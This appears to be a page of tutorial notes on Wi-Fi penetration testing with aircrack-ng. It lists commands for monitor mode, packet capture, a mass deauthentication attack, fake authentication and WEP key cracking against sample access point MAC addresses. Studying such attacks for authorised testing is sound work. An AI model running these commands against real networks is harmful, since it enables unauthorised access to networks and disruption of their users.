You are on page 1of 2

Changing Mode

iwconfig - Show all wireless interfaces only

ifconfig wlan0 down


root@kali: airmon-ng check kill

iwconfig wlan0 mode monitor


ifconfig wlan0 up
iwconfig

airodump-ng mon0

Seeing all available wireless network

Showing 5G band
airodump-ng --band a mon0

Showing 5G and 2.4 GHz Band


airodump-ng --band abg mon0

Gaining Accessing WEP Cracking

Accesing a Specific Wireless network


root@kali: airodump-ng --bssid f8:23:b2:b9:50:a8 --channel 2 --write test mon0

Opening test-01.cap in Wireshark


wireshark

Deauthentication Attack

aireplay-ng --deauth 100000000 -a F8:23:B2:B9:50:A8 -C 80:E6:50:22:A2:E8 MON0

Cracking Wired Equivalent Privacy (WEP)


airodump-ng --bssid F8:23:B2:B9:50:A8 --channel 1 --write basic_wep mon0

aircrack-ng basic_wep-01.cap

WEP Cracking Problem


.If the network is not busy
.it would take some time to captured enough IVS

Solution:
Force the AP to generate new IVs.

Forcing Network to generate enough packets/data


airodump-ng --bssid F8:23:B2:B9:50:A8 --channel 6 --write arpreplay mon0

aireplay-ng --fakeauth 0 -a F8:23:B2:B9:50:A8 -h 80:E6:50:22:A2:E8 mon0

You might also like